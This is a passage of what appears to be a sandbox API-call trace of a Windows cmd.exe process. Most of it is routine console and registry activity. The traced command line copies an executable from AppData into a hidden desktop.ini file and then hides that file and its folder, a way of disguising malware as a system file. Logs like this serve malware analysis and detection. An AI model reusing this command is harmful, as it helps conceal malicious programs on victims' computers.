lpAddress=0x1f1000, lpBuffer=0x2efc6c, dwLength=0x1c | out: lpBuffer=0x2efc6c*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0133.332] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efc6c, dwLength=0x1c | out: lpBuffer=0x2efc6c*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0133.332] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efc6c, dwLength=0x1c | out: lpBuffer=0x2efc6c*(BaseAddress=0x2f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xc0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0133.332] GetConsoleOutputCP () returned 0x1b5 [0133.332] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0133.332] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0133.332] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.332] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0133.333] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.333] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0133.333] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.333] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0133.333] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.333] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0133.333] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.333] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0133.333] GetEnvironmentStringsW () returned 0x3c04e8* [0133.333] FreeEnvironmentStringsW (penv=0x3c04e8) returned 1 [0133.334] GetEnvironmentStringsW () returned 0x3c04e8* [0133.334] FreeEnvironmentStringsW (penv=0x3c04e8) returned 1 [0133.334] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", 
ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eec0c | out: phkResult=0x2eec0c*=0x40) returned 0x0 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x0, lpData=0x2eec18*=0x98, lpcbData=0x2eec10*=0x1000) returned 0x2 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x4, lpData=0x2eec18*=0x1, lpcbData=0x2eec10*=0x4) returned 0x0 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x0, lpData=0x2eec18*=0x1, lpcbData=0x2eec10*=0x1000) returned 0x2 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x4, lpData=0x2eec18*=0x0, lpcbData=0x2eec10*=0x4) returned 0x0 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x4, lpData=0x2eec18*=0x40, lpcbData=0x2eec10*=0x4) returned 0x0 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x4, lpData=0x2eec18*=0x40, lpcbData=0x2eec10*=0x4) returned 0x0 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x0, lpData=0x2eec18*=0x40, lpcbData=0x2eec10*=0x1000) returned 0x2 [0133.334] RegCloseKey (hKey=0x40) returned 0x0 [0133.334] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eec0c | out: 
phkResult=0x2eec0c*=0x40) returned 0x0 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x0, lpData=0x2eec18*=0x40, lpcbData=0x2eec10*=0x1000) returned 0x2 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x4, lpData=0x2eec18*=0x1, lpcbData=0x2eec10*=0x4) returned 0x0 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x0, lpData=0x2eec18*=0x1, lpcbData=0x2eec10*=0x1000) returned 0x2 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x4, lpData=0x2eec18*=0x0, lpcbData=0x2eec10*=0x4) returned 0x0 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x4, lpData=0x2eec18*=0x9, lpcbData=0x2eec10*=0x4) returned 0x0 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x4, lpData=0x2eec18*=0x9, lpcbData=0x2eec10*=0x4) returned 0x0 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x0, lpData=0x2eec18*=0x9, lpcbData=0x2eec10*=0x1000) returned 0x2 [0133.334] RegCloseKey (hKey=0x40) returned 0x0 [0133.334] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886367 [0133.334] srand (_Seed=0x5b886367) [0133.334] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\"" [0133.334] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\"" [0133.335] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.335] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3c1c48, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0133.335] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0133.335] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.335] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.335] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0133.335] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0133.335] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 
13 [0133.335] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0133.335] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0133.335] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0133.335] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0133.335] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0133.335] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0133.335] GetEnvironmentStringsW () returned 0x3c2638* [0133.335] FreeEnvironmentStringsW (penv=0x3c2638) returned 1 [0133.335] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.335] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.335] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0133.335] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0133.335] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0133.335] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0133.335] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0133.336] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0133.336] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0133.336] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0133.336] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef9d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.336] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef9d8, lpFilePart=0x2ef9d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef9d4*="Desktop") returned 0x18 [0133.336] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0133.336] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef754 | out: 
lpFindFileData=0x2ef754) returned 0x3c0cc8 [0133.336] FindClose (in: hFindFile=0x3c0cc8 | out: hFindFile=0x3c0cc8) returned 1 [0133.336] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef754 | out: lpFindFileData=0x2ef754) returned 0x3c0cc8 [0133.336] FindClose (in: hFindFile=0x3c0cc8 | out: hFindFile=0x3c0cc8) returned 1 [0133.336] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef754 | out: lpFindFileData=0x2ef754) returned 0x3c0cc8 [0133.336] FindClose (in: hFindFile=0x3c0cc8 | out: hFindFile=0x3c0cc8) returned 1 [0133.336] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0133.336] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0133.336] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0133.336] GetEnvironmentStringsW () returned 0x3c04e8* [0133.337] FreeEnvironmentStringsW (penv=0x3c04e8) returned 1 [0133.337] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.337] GetConsoleOutputCP () returned 0x1b5 [0133.337] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0133.337] GetUserDefaultLCID () returned 0x409 [0133.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efb18, cchData=128 | out: lpLCData="0") returned 2 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efb18, cchData=128 | out: lpLCData="0") returned 2 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efb18, cchData=128 | out: lpLCData="1") returned 2 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 
[0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0133.338] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0133.339] GetConsoleTitleW (in: lpConsoleTitle=0x3b0af8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.339] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0133.339] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0133.339] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0133.339] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0133.340] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0133.340] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0133.340] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0133.340] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0133.340] _wcsicmp 
(_String1="IF/?", _String2="attrib") returned 8 [0133.340] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0133.340] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0133.342] _wcsicmp (_String1="del", _String2=")") returned 59 [0133.342] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0133.342] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0133.342] _wcsicmp (_String1="IF", _String2="del") returned 5 [0133.342] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0133.343] _wcsicmp (_String1="REM", _String2="del") returned 14 [0133.343] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0133.344] _wcsicmp (_String1="type", _String2=")") returned 75 [0133.345] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0133.345] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0133.345] _wcsicmp (_String1="IF", _String2="type") returned -11 [0133.345] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0133.345] _wcsicmp (_String1="REM", _String2="type") returned -2 [0133.345] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0133.459] SetErrorMode (uMode=0x0) returned 0x0 [0133.459] SetErrorMode (uMode=0x1) returned 0x0 [0133.459] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3c04f0, lpFilePart=0x2ef2cc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef2cc*="Desktop") returned 0x18 [0133.459] SetErrorMode (uMode=0x0) returned 0x1 [0133.459] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0133.459] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0133.464] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.464] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2ef048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef048) returned 0xffffffff [0133.464] GetLastError () returned 0x2 [0133.464] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2ef048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef048) returned 0xffffffff [0133.465] GetLastError () returned 0x2 [0133.465] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2ef048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef048) returned 0x3c25d8 [0133.465] FindClose (in: hFindFile=0x3c25d8 | out: hFindFile=0x3c25d8) returned 1 [0133.465] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2ef048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef048) returned 0xffffffff [0133.465] GetLastError () returned 0x2 [0133.465] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ef048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef048) returned 0x3c25d8 [0133.465] FindClose (in: hFindFile=0x3c25d8 | out: hFindFile=0x3c25d8) returned 1 [0133.465] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0133.465] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0133.465] GetConsoleTitleW (in: lpConsoleTitle=0x2ef540, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.465] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef3c8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef490 | out: lpAttributeList=0x2ef3c8, lpSize=0x2ef490) returned 1 [0133.465] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef3c8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef488, 
cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef3c8, lpPreviousValue=0x0) returned 1 [0133.465] GetStartupInfoW (in: lpStartupInfo=0x2ef384 | out: lpStartupInfo=0x2ef384*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0133.466] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0133.466] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef424*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef470 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" ", lpProcessInformation=0x2ef470*(hProcess=0x50, hThread=0x4c, dwProcessId=0xba4, dwThreadId=0xb60)) returned 1 [0133.565] CloseHandle (hObject=0x4c) returned 1 [0133.565] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0133.565] GetEnvironmentStringsW () returned 0x3c0a18* [0133.565] FreeEnvironmentStringsW (penv=0x3c0a18) returned 1 [0133.565] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0133.635] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2ef364 | out: 
lpExitCode=0x2ef364*=0x0) returned 1 [0133.635] CloseHandle (hObject=0x50) returned 1 [0133.635] _vsnwprintf (in: _Buffer=0x2ef4ac, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef370 | out: _Buffer="00000000") returned 8 [0133.635] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0133.636] GetEnvironmentStringsW () returned 0x3c2628* [0133.636] FreeEnvironmentStringsW (penv=0x3c2628) returned 1 [0133.636] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0133.636] GetEnvironmentStringsW () returned 0x3c2628* [0133.636] FreeEnvironmentStringsW (penv=0x3c2628) returned 1 [0133.636] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef3c8 | out: lpAttributeList=0x2ef3c8) [0133.636] GetConsoleTitleW (in: lpConsoleTitle=0x2ef748, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.636] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ee7c0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x2ee7c4, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ee7c0*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0133.637] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0133.637] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0133.637] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0133.637] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\desktop.ini")) returned 0xffffffff [0133.637] GetLastError () returned 0x2 [0133.637] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd")) returned 0x10 [0133.637] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0133.637] _wcsicmp 
(_String1="desktop.ini", _String2="..") returned 54 [0133.637] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\desktop.ini")) returned 0xffffffff [0133.637] GetLastError () returned 0x2 [0133.637] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x3c36b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3c36b4) returned 0xffffffff [0133.638] GetLastError () returned 0x2 [0133.638] _get_osfhandle (_FileHandle=2) returned 0xb [0133.638] GetFileType (hFile=0xb) returned 0x2 [0133.638] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0133.638] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2ef1c0 | out: lpMode=0x2ef1c0) returned 1 [0133.638] _get_osfhandle (_FileHandle=2) returned 0xb [0133.638] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2ef1f4 | out: lpConsoleScreenBufferInfo=0x2ef1f4) returned 1 [0133.638] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0133.639] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.639] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.639] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.639] GetFileType (hFile=0x7) returned 0x2 [0133.639] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0133.639] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef8e4 | out: lpMode=0x2ef8e4) returned 1 [0133.639] _dup (_FileHandle=1) returned 3 [0133.640] _close (_FileHandle=1) returned 0 [0133.640] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini", _String2="con") returned -53 [0133.640] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini" (normalized: 
"c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2ef8b4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0133.640] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0133.640] GetConsoleTitleW (in: lpConsoleTitle=0x2ef6e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.640] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x2ef248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef248) returned 0x3be6b8 [0133.641] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0133.641] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0133.641] GetFileAttributesW 